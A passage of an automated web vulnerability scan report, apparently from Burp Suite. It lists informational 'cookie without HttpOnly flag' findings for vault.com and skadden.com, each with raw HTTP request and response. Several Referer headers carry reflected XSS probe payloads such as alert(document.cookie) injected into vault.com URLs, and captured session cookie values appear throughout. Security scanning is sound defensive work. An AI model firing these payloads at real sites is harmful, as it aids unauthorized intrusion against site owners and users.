Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /index.cfm?contentID=42&itemID=1478 HTTP/1.1
Host: www.skadden.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=34916643.1295449749.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); BACKLINK=; __utma=34916643.540692983.1295449749.1295449749.1295449749.1; __utmc=34916643; __utmb=34916643;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:14:39 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: BACKLINK=%2CcontentID%3D42%26itemID%3D1478;expires=Fri, 11-Jan-2041 15:14:39 GMT;path=/
Content-Type: text/html; charset=UTF-8


                                                                                                               <!DOCTYPE html PUB
...[SNIP]...

10.134. http://www.vault.com/com.vault.home.portlets/homeflash802010.xml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.vault.com
Path:   /com.vault.home.portlets/homeflash802010.xml

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /com.vault.home.portlets/homeflash802010.xml HTTP/1.1
Host: www.vault.com
Proxy-Connection: keep-alive
Referer: http://www.vault.com/com.vault.home.portlets/homepage_flash.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=0000D17FxsLaClL9SFBlj1f2sjv:140gkm3u6; __utmz=199986601.1295451341.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/7; __utma=199986601.140982030.1295451341.1295451341.1295451341.1; __utmc=199986601; __utmb=199986601.3.8.1295451341966; NSC_xxx.wbvmu.dpn=ffffffffd2d89a6f45525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Wed, 19 Jan 2011 15:35:27 GMT
Server: IBM_HTTP_Server
Last-Modified: Fri, 20 Aug 2010 12:24:20 GMT
Vary: User-Agent,Accept-Encoding
Content-Type: text/xml
Content-Language: en-US
Set-Cookie: NSC_xxx.wbvmu.dpn=ffffffffd2d89a6f45525d5f4f58455e445a4a423660;expires=Wed, 19-Jan-2011 15:37:31 GMT;path=/
Content-Length: 10016

<?xml version="1.0" encoding="utf-8" standalone="no"?>
<vaultxml>
<bgcolor>FFFFFF</bgcolor>
<headertext>What's the key to your career success?</headertext>
<contentlist>
<listentry>
<
...[SNIP]...

10.135. http://www.vault.com/com.vault.home.portlets/homepage_flash.swf  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.vault.com
Path:   /com.vault.home.portlets/homepage_flash.swf

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /com.vault.home.portlets/homepage_flash.swf HTTP/1.1
Host: www.vault.com
Proxy-Connection: keep-alive
Referer: http://www.vault.com/wps/portal/usa/rankingsf6c40'%3balert(document.cookie)//dba4d06d54c/individual
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=0000D17FxsLaClL9SFBlj1f2sjv:140gkm3u6; __utmz=199986601.1295451341.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/7; NSC_xxx.wbvmu.dpn=ffffffffd2d89a6f45525d5f4f58455e445a4a423660; __utma=199986601.140982030.1295451341.1295451341.1295451341.1; __utmc=199986601; __utmb=199986601.3.8.1295451341966

Response

HTTP/1.1 200 OK
Date: Wed, 19 Jan 2011 15:35:26 GMT
Server: IBM_HTTP_Server
Last-Modified: Fri, 29 Jan 2010 19:03:12 GMT
Vary: User-Agent,Accept-Encoding
Content-Type: text/plain
Content-Language: en-US
Set-Cookie: NSC_xxx.wbvmu.dpn=ffffffffd2d89a6f45525d5f4f58455e445a4a423660;expires=Wed, 19-Jan-2011 15:37:30 GMT;path=/
Content-Length: 28093

CWS.....x....@T..0|......H.....E...#..,...V..H.5em.Q.(b....T......5..{.Q..`.1.$&.3s...K'.}.{.o....s..9...3sgf.A..@6..R.......w...F_...8.#...7.r.'.'$MMHQ.z$%...e&x..$d....ee.zD.P.2U9..h.?F.2....).Y.    ..
...[SNIP]...

10.136. http://www.vault.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.vault.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
Host: www.vault.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=199986601.1295451341.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/7; JSESSIONID=00000-dJvfxGNM9UrnCQsyBDC18:140gkm3u6; __utma=199986601.140982030.1295451341.1295451341.1295451341.1; __utmc=199986601; __utmb=199986601.5.8.1295451341966; NSC_xxx.wbvmu.dpn=ffffffffd2d89a6f45525d5f4f58455e445a4a423660; _chartbeat2=1wcinl964s8aejot

Response

HTTP/1.1 404 Not Found
Date: Wed, 19 Jan 2011 15:36:14 GMT
Server: IBM_HTTP_Server
Last-Modified: Thu, 29 Jul 2010 15:07:13 GMT
ETag: "a30d5e-288a-16cfca40"
Accept-Ranges: bytes
ntCoent-Length: 10378
Vary: User-Agent
Cache-Control: max-age=7200, must-revalidate
Content-Type: text/html
Set-Cookie: NSC_xxx.wbvmu.dpn=ffffffffd2d89a6f45525d5f4f58455e445a4a423660;expires=Wed, 19-Jan-2011 15:38:18 GMT;path=/
Content-Length: 10378


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
   <meta http-equiv="X-UA-Compatible" con
...[SNIP]...

10.137. http://www.vault.com/images/arrow-right-middle.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.vault.com
Path:   /images/arrow-right-middle.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/arrow-right-middle.gif HTTP/1.1
Host: www.vault.com
Proxy-Connection: keep-alive
Referer: http://www.vault.com/wps/portal/usa/rankingsf6c40'%3balert(document.cookie)//dba4d06d54c/individual
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=0000D17FxsLaClL9SFBlj1f2sjv:140gkm3u6; NSC_xxx.wbvmu.dpn=ffffffffd2d89a6f45525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Wed, 19 Jan 2011 15:35:26 GMT
Server: IBM_HTTP_Server
Last-Modified: Fri, 10 Apr 2009 20:09:47 GMT
ETag: "ae0073-3e-f240b8c0"
Accept-Ranges: bytes
Content-Length: 62
Vary: User-Agent
Cache-Control: max-age=7200, must-revalidate
Content-Type: image/gif
Set-Cookie: NSC_xxx.wbvmu.dpn=ffffffffd2d89a6f45525d5f4f58455e445a4a423660;expires=Wed, 19-Jan-2011 15:37:30 GMT;path=/

GIF89a..............z....!.......,............~b.;.......{...;

10.138. http://www.vault.com/images/backgrounds/blue_gradient_reviews.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.vault.com
Path:   /images/backgrounds/blue_gradient_reviews.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/backgrounds/blue_gradient_reviews.jpg HTTP/1.1
Host: www.vault.com
Proxy-Connection: keep-alive
Referer: http://www.vault.com/wps/portal/usa/rankingsf6c40'%3balert(document.cookie)//dba4d06d54c/individual
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=0000D17FxsLaClL9SFBlj1f2sjv:140gkm3u6; __utmz=199986601.1295451341.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/7; NSC_xxx.wbvmu.dpn=ffffffffd2d89a6f45525d5f4f58455e445a4a423660; __utma=199986601.140982030.1295451341.1295451341.1295451341.1; __utmc=199986601; __utmb=199986601.3.8.1295451341966

Response

HTTP/1.1 200 OK
Date: Wed, 19 Jan 2011 15:35:33 GMT
Server: IBM_HTTP_Server
Last-Modified: Fri, 10 Apr 2009 20:09:04 GMT
ETag: "b48142-177-efb09800"
Accept-Ranges: bytes
Content-Length: 375
Vary: User-Agent
Cache-Control: max-age=7200, must-revalidate
Content-Type: image/jpeg
Set-Cookie: NSC_xxx.wbvmu.dpn=ffffffffd2d89a6f45525d5f4f58455e445a4a423660;expires=Wed, 19-Jan-2011 15:37:36 GMT;path=/

......JFIF.....d.d......Ducky.......P......Adobe.d.....................................................        

       ......................    ..    .    .............................................................
...[SNIP]...

10.139. http://www.vault.com/images/backgrounds/footer_background.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.vault.com
Path:   /images/backgrounds/footer_background.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/backgrounds/footer_background.jpg HTTP/1.1
Host: www.vault.com
Proxy-Connection: keep-alive
Referer: http://www.vault.com/wps/portal/usa/rankingsf6c40'%3balert(document.cookie)//dba4d06d54c/individual
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=0000D17FxsLaClL9SFBlj1f2sjv:140gkm3u6; __utmz=199986601.1295451341.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/7; NSC_xxx.wbvmu.dpn=ffffffffd2d89a6f45525d5f4f58455e445a4a423660; __utma=199986601.140982030.1295451341.1295451341.1295451341.1; __utmc=199986601; __utmb=199986601.3.8.1295451341966

Response

HTTP/1.1 200 OK
Date: Wed, 19 Jan 2011 15:35:33 GMT
Server: IBM_HTTP_Server
Last-Modified: Tue, 29 Jun 2010 14:41:11 GMT
ETag: "10e0005-1c2-3a784fc0"
Accept-Ranges: bytes
Content-Length: 450
Vary: User-Agent
Cache-Control: max-age=7200, must-revalidate
Content-Type: image/jpeg
Set-Cookie: NSC_xxx.wbvmu.dpn=ffffffffd2d89a6f45525d5f4f58455e445a4a423660;expires=Wed, 19-Jan-2011 15:37:36 GMT;path=/

......JFIF.....d.d......Ducky.......d......Adobe.d......................................................................................................................................................
...[SNIP]...

10.140. http://www.vault.com/images/backgrounds/header-gray.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.vault.com
Path:   /images/backgrounds/header-gray.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/backgrounds/header-gray.jpg HTTP/1.1
Host: www.vault.com
Proxy-Connection: keep-alive
Referer: http://www.vault.com/wps/portal/usa/rankingsf6c40'%3balert(document.cookie)//dba4d06d54c/individual
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=0000D17FxsLaClL9SFBlj1f2sjv:140gkm3u6; __utmz=199986601.1295451341.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/7; NSC_xxx.wbvmu.dpn=ffffffffd2d89a6f45525d5f4f58455e445a4a423660; __utma=199986601.140982030.1295451341.1295451341.1295451341.1; __utmc=199986601; __utmb=199986601.3.8.1295451341966

Response

HTTP/1.1 200 OK
Date: Wed, 19 Jan 2011 15:35:32 GMT
Server: IBM_HTTP_Server
Last-Modified: Fri, 10 Apr 2009 20:09:05 GMT
ETag: "b480fb-145-efbfda40"
Accept-Ranges: bytes
Content-Length: 325
Vary: User-Agent
Cache-Control: max-age=7200, must-revalidate
Content-Type: image/jpeg
Set-Cookie: NSC_xxx.wbvmu.dpn=ffffffffd2d89a6f45525d5f4f58455e445a4a423660;expires=Wed, 19-Jan-2011 15:37:35 GMT;path=/

......JFIF.....d.d......Ducky.......<......Adobe.d....................    ...    .......

.

...............................................................................................................
...[SNIP]...

10.141. http://www.vault.com/images/blogs/photo-small-1260.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.vault.com
Path:   /images/blogs/photo-small-1260.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/blogs/photo-small-1260.jpg HTTP/1.1
Host: www.vault.com
Proxy-Connection: keep-alive
Referer: http://www.vault.com/wps/portal/usa/rankings/individual?rankingId1=2&rankingId2=-1fa29d%22%3E%3Cscript%3Ealert(1)%3C/script%3E5276a27416&rankings=1&regionId=0/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=199986601.1295451341.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/7; __utma=199986601.140982030.1295451341.1295451341.1295451341.1; __utmc=199986601; __utmb=199986601.5.8.1295451341966; _chartbeat2=1wcinl964s8aejot; JSESSIONID=0000PKS73Wmf_IK-VDDZBly2VV1:140i3s34m; NSC_xxx.wbvmu.dpn=ffffffffd2d89a6f45525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Wed, 19 Jan 2011 15:37:11 GMT
Server: IBM_HTTP_Server
Last-Modified: Fri, 18 Jun 2010 18:10:45 GMT
ETag: "ea0016-361b-dfaf3340"
Accept-Ranges: bytes
Content-Length: 13851
Vary: User-Agent
Cache-Control: max-age=7200, must-revalidate
Content-Type: image/jpeg
Set-Cookie: NSC_xxx.wbvmu.dpn=ffffffffd2d89a6f45525d5f4f58455e445a4a423660;expires=Wed, 19-Jan-2011 15:39:14 GMT;path=/

......JFIF.....H.H......Exif..MM.*.............................b...........j.(...........1.........r.2...........i...............
....'..
....'.Adobe Photoshop CS3 Windows.2010:04:15 17:55:25.........
...[SNIP]...

10.142. http://www.vault.com/images/dotted_separator.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.vault.com
Path:   /images/dotted_separator.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/dotted_separator.gif HTTP/1.1
Host: www.vault.com
Proxy-Connection: keep-alive
Referer: http://www.vault.com/wps/portal/usa/rankingsf6c40'%3balert(document.cookie)//dba4d06d54c/individual
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=0000D17FxsLaClL9SFBlj1f2sjv:140gkm3u6; NSC_xxx.wbvmu.dpn=ffffffffd2d89a6f45525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Wed, 19 Jan 2011 15:35:25 GMT
Server: IBM_HTTP_Server
Last-Modified: Tue, 06 Jul 2010 13:57:46 GMT
ETag: "ae0344-48-7016ca80"
Accept-Ranges: bytes
Content-Length: 72
Vary: User-Agent
Cache-Control: max-age=7200, must-revalidate
Content-Type: image/gif
Set-Cookie: NSC_xxx.wbvmu.dpn=ffffffffd2d89a6f45525d5f4f58455e445a4a423660;expires=Wed, 19-Jan-2011 15:37:29 GMT;path=/

GIF89a......###...{{{WWW............!.......,.........X%....F..V....;

10.143. http://www.vault.com/images/employer_section_header.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.vault.com
Path:   /images/employer_section_header.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/employer_section_header.jpg HTTP/1.1
Host: www.vault.com
Proxy-Connection: keep-alive
Referer: http://www.vault.com/wps/portal/usa/rankingsf6c40'%3balert(document.cookie)//dba4d06d54c/individual
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=0000D17FxsLaClL9SFBlj1f2sjv:140gkm3u6; __utmz=199986601.1295451341.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/7; __utma=199986601.140982030.1295451341.1295451341.1295451341.1; __utmc=199986601; __utmb=199986601.1.10.1295451341; NSC_xxx.wbvmu.dpn=ffffffffd2d89a6f45525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Wed, 19 Jan 2011 15:35:32 GMT
Server: IBM_HTTP_Server
Last-Modified: Wed, 23 Jun 2010 13:42:13 GMT
ETag: "ae033c-d74-b48a7740"
Accept-Ranges: bytes
Content-Length: 3444
Vary: User-Agent
Cache-Control: max-age=7200, must-revalidate
Content-Type: image/jpeg
Set-Cookie: NSC_xxx.wbvmu.dpn=ffffffffd2d89a6f45525d5f4f58455e445a4a423660;expires=Wed, 19-Jan-2011 15:37:35 GMT;path=/

......JFIF.....d.d......Ducky.......d......Adobe.d......................................................................................................................................................
...[SNIP]...

10.144. http://www.vault.com/images/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.vault.com
Path:   /images/favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/favicon.ico HTTP/1.1
Host: www.vault.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=0000D17FxsLaClL9SFBlj1f2sjv:140gkm3u6; __utmz=199986601.1295451341.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/7; __utma=199986601.140982030.1295451341.1295451341.1295451341.1; __utmc=199986601; __utmb=199986601.3.8.1295451341966; NSC_xxx.wbvmu.dpn=ffffffffd2d89a6f45525d5f4f58455e445a4a423660; _chartbeat2=1wcinl964s8aejot

Response

HTTP/1.1 200 OK
Date: Wed, 19 Jan 2011 15:35:36 GMT
Server: IBM_HTTP_Server
Last-Modified: Wed, 21 Apr 2010 18:01:11 GMT
ETag: "ae0089-57e-faace7c0"
Accept-Ranges: bytes
Content-Length: 1406
Vary: User-Agent
Cache-Control: max-age=7200, must-revalidate
Content-Type: image/x-icon
Set-Cookie: NSC_xxx.wbvmu.dpn=ffffffffd2d89a6f45525d5f4f58455e445a4a423660;expires=Wed, 19-Jan-2011 15:37:40 GMT;path=/

..............h.......(....... ...................................C...4...............'...(...)...+...,.../...1...2...3...5...7...=...?...A...B...B...K...M...Q...U...Y...`...j...u.....................
...[SNIP]...

10.145. http://www.vault.com/images/header_background.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.vault.com
Path:   /images/header_background.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/header_background.jpg HTTP/1.1
Host: www.vault.com
Proxy-Connection: keep-alive
Referer: http://www.vault.com/wps/portal/usa/rankingsf6c40'%3balert(document.cookie)//dba4d06d54c/individual
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=0000D17FxsLaClL9SFBlj1f2sjv:140gkm3u6; __utmz=199986601.1295451341.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/7; __utma=199986601.140982030.1295451341.1295451341.1295451341.1; __utmc=199986601; __utmb=199986601.1.10.1295451341; NSC_xxx.wbvmu.dpn=ffffffffd2d89a6f45525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Wed, 19 Jan 2011 15:35:32 GMT
Server: IBM_HTTP_Server
Last-Modified: Wed, 23 Jun 2010 13:42:30 GMT
ETag: "ae033d-1c7-b58ddd80"
Accept-Ranges: bytes
Content-Length: 455
Vary: User-Agent
Cache-Control: max-age=7200, must-revalidate
Content-Type: image/jpeg
Set-Cookie: NSC_xxx.wbvmu.dpn=ffffffffd2d89a6f45525d5f4f58455e445a4a423660;expires=Wed, 19-Jan-2011 15:37:35 GMT;path=/

......JFIF.....d.d......Ducky.......d......Adobe.d.................................................................................................................................................p....
...[SNIP]...

10.146. http://www.vault.com/images/home/icon-resume.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.vault.com
Path:   /images/home/icon-resume.png

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/home/icon-resume.png HTTP/1.1
Host: www.vault.com
Proxy-Connection: keep-alive
Referer: http://www.vault.com/wps/portal/usa/rankingsf6c40'%3balert(document.cookie)//dba4d06d54c/individual
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=0000D17FxsLaClL9SFBlj1f2sjv:140gkm3u6; NSC_xxx.wbvmu.dpn=ffffffffd2d89a6f45525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Wed, 19 Jan 2011 15:35:26 GMT
Server: IBM_HTTP_Server
Last-Modified: Thu, 07 May 2009 14:50:32 GMT
ETag: "b481ef-1b3-a23dbe00"
Accept-Ranges: bytes
Content-Length: 435
Vary: User-Agent
Cache-Control: max-age=7200, must-revalidate
Content-Type: image/png
Set-Cookie: NSC_xxx.wbvmu.dpn=ffffffffd2d89a6f45525d5f4f58455e445a4a423660;expires=Wed, 19-Jan-2011 15:37:30 GMT;path=/

.PNG
.
...IHDR...(...*........T....tEXtSoftware.Adobe ImageReadyq.e<...`PLTE...ijl)t.......n....................rsu............6}.............z..............|}~.........w..c.-G....IDATx...I.. ....HD
...[SNIP]...

10.147. http://www.vault.com/images/home/no_flash.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.vault.com
Path:   /images/home/no_flash.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/home/no_flash.jpg HTTP/1.1
Host: www.vault.com
Proxy-Connection: keep-alive
Referer: http://www.vault.com/wps/portal/usa/rankingsf6c40'%3balert(document.cookie)//dba4d06d54c/individual
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=0000D17FxsLaClL9SFBlj1f2sjv:140gkm3u6; NSC_xxx.wbvmu.dpn=ffffffffd2d89a6f45525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Wed, 19 Jan 2011 15:35:25 GMT
Server: IBM_HTTP_Server
Last-Modified: Fri, 02 Jul 2010 18:22:52 GMT
ETag: "28002-902a-accb9700"
Accept-Ranges: bytes
Content-Length: 36906
Vary: User-Agent
Cache-Control: max-age=7200, must-revalidate
Content-Type: image/jpeg
Set-Cookie: NSC_xxx.wbvmu.dpn=ffffffffd2d89a6f45525d5f4f58455e445a4a423660;expires=Wed, 19-Jan-2011 15:37:29 GMT;path=/

......JFIF.....d.d......Ducky.......<......Adobe.d....................    ...    .......

.

...............................................................................................................
...[SNIP]...

10.148. http://www.vault.com/images/homepageFlash/01newjob.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.vault.com
Path:   /images/homepageFlash/01newjob.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/homepageFlash/01newjob.jpg HTTP/1.1
Host: www.vault.com
Proxy-Connection: keep-alive
Referer: http://www.vault.com/com.vault.home.portlets/homepage_flash.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=0000D17FxsLaClL9SFBlj1f2sjv:140gkm3u6; __utmz=199986601.1295451341.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/7; __utma=199986601.140982030.1295451341.1295451341.1295451341.1; __utmc=199986601; __utmb=199986601.3.8.1295451341966; NSC_xxx.wbvmu.dpn=ffffffffd2d89a6f45525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Wed, 19 Jan 2011 15:35:28 GMT
Server: IBM_HTTP_Server
Last-Modified: Fri, 10 Apr 2009 20:09:44 GMT
ETag: "b481ed-55ff-f212f200"
Accept-Ranges: bytes
Content-Length: 22015
Vary: User-Agent
Cache-Control: max-age=7200, must-revalidate
Content-Type: image/jpeg
Set-Cookie: NSC_xxx.wbvmu.dpn=ffffffffd2d89a6f45525d5f4f58455e445a4a423660;expires=Wed, 19-Jan-2011 15:37:32 GMT;path=/

......JFIF.....d.d......Ducky.......K......Adobe.d...............................................    


   ..................................................................................................
...[SNIP]...

10.149. http://www.vault.com/images/homepageFlash/02reshelp.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.vault.com
Path:   /images/homepageFlash/02reshelp.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/homepageFlash/02reshelp.jpg HTTP/1.1
Host: www.vault.com
Proxy-Connection: keep-alive
Referer: http://www.vault.com/com.vault.home.portlets/homepage_flash.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
